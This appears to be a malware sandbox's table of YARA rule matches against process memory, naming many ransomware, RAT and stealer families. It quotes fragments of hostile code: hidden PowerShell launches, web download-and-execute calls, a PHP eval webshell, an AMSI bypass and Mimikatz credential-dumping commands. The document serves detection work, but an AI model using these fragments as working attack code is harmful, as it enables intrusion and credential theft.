00000023.00000003.6418803000.0000028BD6E91000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x33e97:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x33ea7:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x345bd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x345ed:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x345fd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x34b67:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x34b77:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000023.00000003.6418803000.0000028BD6E91000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6423203923.0000028BD6EA1000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x2a9b9:$payload4: eval(gzuncompress(base64_decode 0x4033:$php_short: <? 0xf9fa:$php_short: <? 0xfa63:$php_short: <? 0xfacc:$php_short: <? 0xfb35:$php_short: <? 0xfb9e:$php_short: <? 0x3cda9:$php_short: <? 0x40b28:$php_short: <? 0xf9fa:$php_new2: <?php 0xfa63:$php_new2: <?php 0xfacc:$php_new2: <?php 0xfb35:$php_new2: <?php 0xfb9e:$php_new2: <?php
00000023.00000003.6423203923.0000028BD6EA1000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x23e97:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x23ea7:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245bd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245ed:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x245fd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x24b67:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x24b77:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000023.00000003.6423203923.0000028BD6EA1000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6399846790.0000028BD6EA1000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x2a9b9:$payload4: eval(gzuncompress(base64_decode 0x4033:$php_short: <? 0xf9fa:$php_short: <? 0xfa63:$php_short: <? 0xfacc:$php_short: <? 0xfb35:$php_short: <? 0xfb9e:$php_short: <? 0x3cda9:$php_short: <? 0x40b28:$php_short: <? 0xf9fa:$php_new2: <?php 0xfa63:$php_new2: <?php 0xfacc:$php_new2: <?php 0xfb35:$php_new2: <?php 0xfb9e:$php_new2: <?php
00000023.00000003.6399846790.0000028BD6EA1000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x23e97:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x23ea7:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245bd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245ed:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x245fd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x24b67:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x24b77:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000023.00000003.6399846790.0000028BD6EA1000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x17edc:$payload7: eval(base64_decode( 0x54b7:$php_short: <? 0x54e7:$php_short: <? 0x5bd3:$php_short: <? 0x2f8bc:$php_short: <? 0x2fd73:$php_short: <? 0x31c8f:$php_short: <? 0x3254b:$php_short: <? 0x54b7:$php_new2: <?php 0x2fd73:$php_new2: <?php 0x31c8f:$php_new2: <?php 0x3254b:$php_new2: <?php
00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	webshell_php_by_string_known_webshell	Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions.	Arnim Rupp	0x314d7:$pbs7: pwnshell 0x54b7:$php_short: <? 0x54e7:$php_short: <? 0x5bd3:$php_short: <? 0x2f8bc:$php_short: <? 0x2fd73:$php_short: <? 0x31c8f:$php_short: <? 0x3254b:$php_short: <? 0x54b7:$php_new2: <?php 0x2fd73:$php_new2: <?php 0x31c8f:$php_new2: <?php 0x3254b:$php_new2: <?php
00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	Oilrig_IntelSecurityManager	Detects OilRig malware	Eyal Sela	0x3b16b:$one3: srvCheckresponded
00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x3da99:$s1: stratum+tcp://
00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	JoeSecurity_Winexe_tool	Yara detected Winexe tool	Joe Security
00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
Process Memory Space: RegAsm.exe PID: 420	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegAsm.exe PID: 420	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	hacktool_macos_keylogger_logkext	LogKext is an open source keylogger for Mac OS X, a product of FSB software.	@mimeframe	0x18cf45:$a1: logKextPassKey 0x18cf54:$a2: Couldn't get system keychain: 0x340290:$a4: com_fsb_iokit_logKext 0x76487e:$b1: logKext Password: 0x764890:$b2: Logging controls whether the daemon is logging keystrokes (default is on). 0x7648dc:$b2: Logging controls whether the daemon is logging keystrokes (default is on). 0x18cf45:$c1: logKextPassKey
Process Memory Space: MpSigStub.exe PID: 7120	Msfpayloads_msf_psh	Metasploit Payloads - file msf-psh.vba	Florian Roth	0xfa3e5:$s1: powershell.exe -nop -w hidden -e 0x3c38c1:$s1: powershell.exe -nop -w hidden -e 0x3c38ff:$s1: powershell.exe -nop -w hidden -e 0x414da6:$s1: powershell.exe -nop -w hidden -e 0x25f763:$s2: Call Shell( 0x3c4ae5:$s2: Call Shell( 0x3c4b0f:$s2: Call Shell( 0xb58bfa:$s2: Call Shell( 0x2546c0:$s3: Sub Workbook_Open() 0xcb7c99:$s3: Sub Workbook_Open()
Process Memory Space: MpSigStub.exe PID: 7120	HKTL_Meterpreter_inMemory	Detects Meterpreter in-memory	netbiosX, Florian Roth	0xd9a34:$xs1: WS2_32.dll 0x132601:$xs2: ReflectiveLoader 0x27adfa:$xs2: ReflectiveLoader 0x821141:$xs2: ReflectiveLoader 0x821162:$xs2: ReflectiveLoader 0x843348:$xs2: ReflectiveLoader 0x843368:$xs2: ReflectiveLoader 0x84339c:$xs2: ReflectiveLoader
Process Memory Space: MpSigStub.exe PID: 7120	Base64_PS1_Shellcode	Detects Base64 encoded PS1 Shellcode	Nick Carr, David Ledbetter	0x83f12c:$substring: AAAAYInlM 0x83f128:$pattern1: /OiCAAAAYInlM
Process Memory Space: MpSigStub.exe PID: 7120	SUSP_PowerShell_Caret_Obfuscation_2	Detects powershell keyword obfuscated with carets	Florian Roth	0x773423:$r1: p^o^w^e^r^s^h^E^L^L 0x37801c:$r2: p^ower^shell 0x378050:$r2: p^ower^shell 0x773423:$r2: p^o^w^e^r^s^h^E^L^L 0xacdb53:$r2: p^owershell
Process Memory Space: MpSigStub.exe PID: 7120	Tofu_Backdoor	Detects Tofu Trojan	Cylance	0x2eeee6:$a: Cookies: Sym1.0 0x2eef45:$b: \\.\pipe\1[12345678]
Process Memory Space: MpSigStub.exe PID: 7120	Hacktool_Strings_p0wnedShell	p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs	Florian Roth	0x3c6a3f:$x3: lsadump::dcsync 0xaa8245:$x7: Invoke-Mimikatz 0xaa8343:$x9: Invoke-ReflectivePEInjection
Process Memory Space: MpSigStub.exe PID: 7120	Keylogger_CN_APT	Keylogger - generic rule for a Chinese variant	Florian Roth	0x76b93a:$s3: shutdown.exe -r -t 0 0x26a3cb:$s5: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; 0x26a446:$s5: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; 0x2866db:$s5: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; 0x89d848:$s5: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; 0x89d8c6:$s5: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; 0x30c2e9:$s7: User Agent\Post Platform\ 0x30c359:$s7: User Agent\Post Platform\
Process Memory Space: MpSigStub.exe PID: 7120	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x48d42a:$s2: system.net.webclient).downloadstring('http 0x48d48e:$s2: system.net.webclient).downloadstring('http
Process Memory Space: MpSigStub.exe PID: 7120	REDLEAVES_CoreImplant_UniqueStrings	Strings identifying the core REDLEAVES RAT in its deobfuscated state	USG	0x27ce45:$unique4: red_autumnal_leaves_dllmain.dll 0x27cd53:$unique7: \NamePipe_MoreWindows
Process Memory Space: MpSigStub.exe PID: 7120	PLUGX_RedLeaves	Detects specific RedLeaves and PlugX binaries	US-CERT Code Analysis Team	0x27cd69:$s9: RedLeavesCMDSimulatorMutex
Process Memory Space: MpSigStub.exe PID: 7120	DeepPanda_htran_exe	Hack Deep Panda - htran-exe	Florian Roth	0x7335bc:$s15: [+] OK! I Closed The Two Socket.
Process Memory Space: MpSigStub.exe PID: 7120	WindowsCredentialEditor	Windows Credential Editor	unknown	0x44c085:$a: extract the TGT session key 0x16cd74:$b: Windows Credentials Editor
Process Memory Space: MpSigStub.exe PID: 7120	Amplia_Security_Tool	Amplia Security Tool	unknown	0x44bfca:$a: Amplia Security 0x44c085:$e: extract the TGT session key
Process Memory Space: MpSigStub.exe PID: 7120	HackTool_Samples	Hacktool	unknown	0xa85a45:$c: Failed to load SAM functions 0x6ebf30:$i: WPE-C1467211-7C89-49c5-801A-1D048E4014C4
Process Memory Space: MpSigStub.exe PID: 7120	Ammyy_Admin_AA_v3	Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe	Florian Roth	0xb35a5b:$x1: S:\Ammyy\sources\target\TrService.cpp 0xb35a81:$x2: S:\Ammyy\sources\target\TrDesktopCopyRect.cpp 0xb35aaf:$x3: Global\Ammyy.Target.IncomePort 0xb35ace:$x4: S:\Ammyy\sources\target\TrFmFileSys.cpp 0xb35af6:$x5: Please enter password for accessing remote computer 0xb3599b:$s1: CreateProcess1()#3 %d error=%d 0xb359bc:$s2: CHttpClient::SendRequest2(%s, %s, %d) error: invalid host name. 0xb359fe:$s3: ERROR: CreateProcessAsUser() error=%d, session=%d 0xb35a32:$s4: ERROR: FindProcessByName('explorer.exe')
Process Memory Space: MpSigStub.exe PID: 7120	RemCom_RemoteCommandExecution	Detects strings from RemCom tool	Florian Roth	0xfd60f:$: \\.\pipe\%s%s%d
Process Memory Space: MpSigStub.exe PID: 7120	SUSP_Script_Obfuscation_Char_Concat	Detects strings found in sample from CN group repo leak in October 2018	Florian Roth	0x3c51dc:$s1: "c" & "r" & "i" & "p" & "t" 0xcb327c:$s1: "c" & "r" & "i" & "p" & "t"
Process Memory Space: MpSigStub.exe PID: 7120	SUSP_PowerShell_IEX_Download_Combo	Detects strings found in sample from CN group repo leak in October 2018	Florian Roth	0x77f2ea:$x1: IEX ((new-object net.webclient).download 0xaaa386:$x1: IEX ((new-object net.webclient).download 0xacca03:$x1: iex ((new-object net.webclient).Download
Process Memory Space: MpSigStub.exe PID: 7120	APT_MAL_Sandworm_Exaramel_Configuration_Key	Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...	FR/ANSSI/SDO	0x7dff23:$: odhyrfjcnfkdtslt 0x7dff34:$: odhyrfjcnfkdtslt
Process Memory Space: MpSigStub.exe PID: 7120	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x425c41:$s05: fce8890000006089e531d2648b52308b
Process Memory Space: MpSigStub.exe PID: 7120	Pupy_Backdoor	Detects Pupy backdoor	Florian Roth	0xd15455:$x1: reflectively inject a dll into a process. 0x843264:$x4: reflective_inject_dll 0x8432a2:$x4: reflective_inject_dll 0xc6ffc8:$x4: reflective_inject_dll 0xd1543f:$x4: reflective_inject_dll 0xd154cd:$x4: reflective_inject_dll 0x843264:$x8: reflective_inject_dll 0x8432a2:$x8: reflective_inject_dll 0xc6ffc8:$x8: reflective_inject_dll 0xd1543f:$x8: reflective_inject_dll 0xd154cd:$x8: reflective_inject_dll 0x843264:$x9: reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits) 0xc6ffc8:$x9: reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits)
Process Memory Space: MpSigStub.exe PID: 7120	IronPanda_Malware_Htran	Iron Panda Malware Htran	Florian Roth	0x3247d4:$s6: [+] Make a Connection to %s:%d.... 0x324768:$s9: [+] Make a Connection to %s:%d ...... 0x7335bc:$s12: [+] OK! I Closed The Two Socket. 0x32474d:$s13: [-] TransmitPort invalid. 0x3246eb:$s14: [+] Waiting for Client on port:%d ......
Process Memory Space: MpSigStub.exe PID: 7120	TA17_293A_malware_1	inveigh pen testing tools & related artifacts	US-CERT Code Analysis Team (modified by Florian Roth)	0x23f86:$n1: file:// 0x319cf:$n1: file:// 0xd4242:$n1: file:// 0xd4265:$n1: file:// 0x1194cd:$n1: file:// 0x1194f4:$n1: file:// 0x1a7bbc:$n1: file:// 0x1a7def:$n1: file:// 0x1a8e60:$n1: file:// 0x256856:$n1: file:// 0x2844ba:$n1: file:// 0x284eb6:$n1: file:// 0x2854bd:$n1: file:// 0x351fc4:$n1: file:// 0x3a5107:$n1: file:// 0x3a5167:$n1: file:// 0x3ca207:$n1: file:// 0x49f58b:$n1: file:// 0x49f5ad:$n1: file:// 0x5c139b:$n1: file:// 0x5f489d:$n1: file://
Process Memory Space: MpSigStub.exe PID: 7120	PS_AMSI_Bypass	Detects PowerShell AMSI Bypass	Florian Roth	0xa7977c:$s1: .getfield('amsicontext',[reflection.bindingflags]'nonpublic,static'). 0xa797de:$s1: .getfield('amsicontext',[reflection.bindingflags]'nonpublic,static').
Process Memory Space: MpSigStub.exe PID: 7120	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x3c6a01:$s1: sekurlsa::msv 0x3c69ef:$s2: sekurlsa::wdigest 0x7fcabf:$s2: sekurlsa::wdigest 0x3c69cb:$s4: sekurlsa::kerberos 0x7fcaac:$s4: sekurlsa::kerberos 0x3c6980:$s5: sekurlsa::tspkg 0x3c696e:$s6: sekurlsa::livessp 0x7fca81:$s6: sekurlsa::livessp 0x3c695f:$s7: sekurlsa::ssp 0x3c694d:$s9: sekurlsa::process 0x7fca6f:$s9: sekurlsa::process 0x3c69a3:$s11: sekurlsa::pth 0x3fc4f:$s12: sekurlsa::tickets 0x3c6991:$s12: sekurlsa::tickets 0x3c69de:$s13: sekurlsa::ekeys 0x3c6911:$s14: sekurlsa::dpapi 0x3c68ff:$s15: sekurlsa::credman 0x7fca34:$s15: sekurlsa::credman
Process Memory Space: MpSigStub.exe PID: 7120	HackTool_MSIL_SharPersist_2	unknown	FireEye	0xcca246:$a1: SharPersist.lib 0xcca256:$a2: SharPersist.exe 0xcca266:$b1: ERROR: Invalid hotkey location option given. 0xcca293:$b2: ERROR: Invalid hotkey given. 0xcca2b0:$b3: ERROR: Keepass configuration file not found. 0xcca2dd:$b4: ERROR: Keepass configuration file was not found. 0xcca30e:$b5: ERROR: That value already exists in: 0xcca333:$b6: ERROR: Failed to delete hidden registry key. 0xcca360:$pdb1: \SharPersist\ 0xcca36e:$pdb2: \SharPersist.pdb 0xcca37f:$pdb2: \SharPersist.pdb
Process Memory Space: MpSigStub.exe PID: 7120	CredTheft_MSIL_ADPassHunt_2	unknown	FireEye	0x2ef2c:$pdb1: \ADPassHunt\ 0x2ef39:$pdb2: \ADPassHunt.pdb 0x2ef49:$s1: Usage: .\ADPassHunt.exe 0x2ef61:$s2: [ADA] Searching for accounts with msSFU30Password attribute 0x2ef9d:$s3: [ADA] Searching for accounts with userpassword attribute 0x2efd6:$s4: [GPP] Searching for passwords now 0x2eff8:$s4: [GPP] Searching for passwords now 0xd15627:$s4: [GPP] Searching for passwords now
Process Memory Space: MpSigStub.exe PID: 7120	APT_Backdoor_Win_GoRat_Memory	Identifies GoRat malware in memory based on strings.	FireEye	0x2feec2:$rat1: rat/modules/socks.(HTTPProxyClient).beacon 0x2feda7:$rat2: rat.(Core).generateBeacon 0x2fedc2:$rat3: rat.gJitter 0x2fedcf:$rat4: rat/comms.(protectedChannel).SendCmdResponse 0x2fee33:$rat6: rat/modules/latlisten.(latlistensrv).handleCmd 0x2fee99:$rat8: rat/modules/netsweeper.(Pinger).listen 0x2feec2:$rat9: rat/modules/socks.(HTTPProxyClient).beacon 0x2feeef:$rat10: rat/platforms/win/dyloader.(memoryLoader).ExecutePluginFunction 0x2fed80:$winblows: rat/platforms/win.(winblows).GetStage
Process Memory Space: MpSigStub.exe PID: 7120	ChinaChopper_Generic	China Chopper Webshells - PHP and ASPX	Florian Roth	0x7865f3:$php: php @eval($_POST[
Process Memory Space: MpSigStub.exe PID: 7120	Oilrig_IntelSecurityManager_macro	Detects OilRig malware	Eyal Sela (slightly modified by Florian Roth)	0x28c33c:$one6: Shell Environ$("COMSPEC") & " /c 0x96fd77:$one6: Shell Environ$("COMSPEC") & " /c 0x9701db:$one6: Shell Environ$("COMSPEC") & " /c 0x9701fc:$one7: echo " & Chr(32) & cmd & Chr(32) & " > " & Chr(34) 0x970193:$two5: NullRefrencedException 0x9701ab:$two6: error has occurred in user32.dll by 0x970193:$two7: NullRefrencedException
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_blackmoon	Yara detected BlackMoon Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_cerber	Yara detected Cerber ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Buran	Yara detected Buran Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Meterpreter	Yara detected Meterpreter	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Valak_1	Yara detected Valak	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_RevengeRAT	Yara detected RevengeRAT	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_AESCRYPTRansomware	Yara detected AESCRYPT Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_VB_Keylogger_Generic	Yara detected VB_Keylogger_Generic	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Vidar	Yara detected Vidar stealer	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_GABUTS	Yara detected GABUTS Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_gogoogle	Yara detected GoGoogle ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Ragnarok_ransomware	Yara detected Ragnarok ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Codoso_Ghost	Yara detected Codoso Ghost	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Axiom	Yara detected Axiom Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Hancitor	Yara detected Hancitor	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_rhino	Yara detected Rhino ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Voidcrypt	Yara detected Voidcrypt Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_DarkSide	Yara detected DarkSide Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_ByteLocker	Yara detected ByteLocker Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Dorkbot	Yara detected Dorkbot	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Clay	Yara detected Clay Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_OCT_RANSOMWARE	Yara detected OCT Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_AutohotkeyDownloaderGeneric	Yara detected Autohotkey Downloader Generic	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Mailto	Yara detected Mailto ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Pony	Yara detected Pony	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_CoronaCrypt	Yara detected CoronaCrypt Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_LokiLocker	Yara detected LokiLocker Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_MegaCortex	Yara detected MegaCortex Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_MiniRAT	Yara detected Mini RAT	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Clop	Yara detected Clop Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Ouroboros_ransomware	Yara detected Ouroboros ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_jcrypt	Yara detected Jcrypt Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_LaZagne	Yara detected LaZagne password dumper	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_NoCry	Yara detected NoCry Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Koadic	Yara detected Koadic	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_EvilGnomeRC5Key	Yara detected Linux EvilGnome RC5 key	unknown
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_LockBit_ransomware	Yara detected LockBit ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Zeppelin	Yara detected Zeppelin Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Ryuk	Yara detected Ryuk ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Artemon	Yara detected Artemon Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Xorist_ransomware	Yara detected Xorist ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Delta	Yara detected Delta Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_MSIL_Load_Encrypted_Assembly	Yara detected MSIL_Load_Encrypted_Assembly	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Evrial	Yara detected Evrial Stealer	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Nemty	Yara detected Nemty Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Avaddon	Yara detected Avaddon Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_CryLock	Yara detected CryLock ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Growtopia	Yara detected Growtopia	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_lockfile	Yara detected LOCKFILE ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Winexe_tool	Yara detected Winexe tool	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_blackmatter	Yara detected BLACKMatter Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Marvel	Yara detected Marvel Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Chaos	Yara detected Chaos Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Nukesped	Yara detected Nukesped	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_NetWire_1	Yara detected NetWire RAT	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Gocoder_3	Yara detected Gocoder ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_WannaRen	Yara detected WannaRen ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Gocoder	Yara detected Gocoder ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_LimeRAT	Yara detected LimeRAT	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Parallax_RAT	Yara detected Parallax RAT	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_babuk	Yara detected Babuk Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Betabot	Yara detected Betabot	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Silvertor	Yara detected Silvertor Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_vhd	Yara detected VHD ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Netwalker	Yara detected Netwalker ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_bitcoinminer	Yara detected BitCoin Miner	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_RekenSom	Yara detected RekenSom ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Annabelle	Yara detected Annabelle Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_RemComRemoteAdmin	Yara detected RemCom RemoteAdmin tool	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Shellcode_Injector	Yara detected generic Shellcode Injector	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_lazparking	Yara detected LazParking Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Jigsaw	Yara detected Jigsaw	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_WinSecDisabler	Yara detected Windows Security Disabler	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Snatch	Yara detected Snatch Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_Cute	Yara detected Cute Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_apis	Yara detected Apis Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_mock	Yara detected Mock Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 7120	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
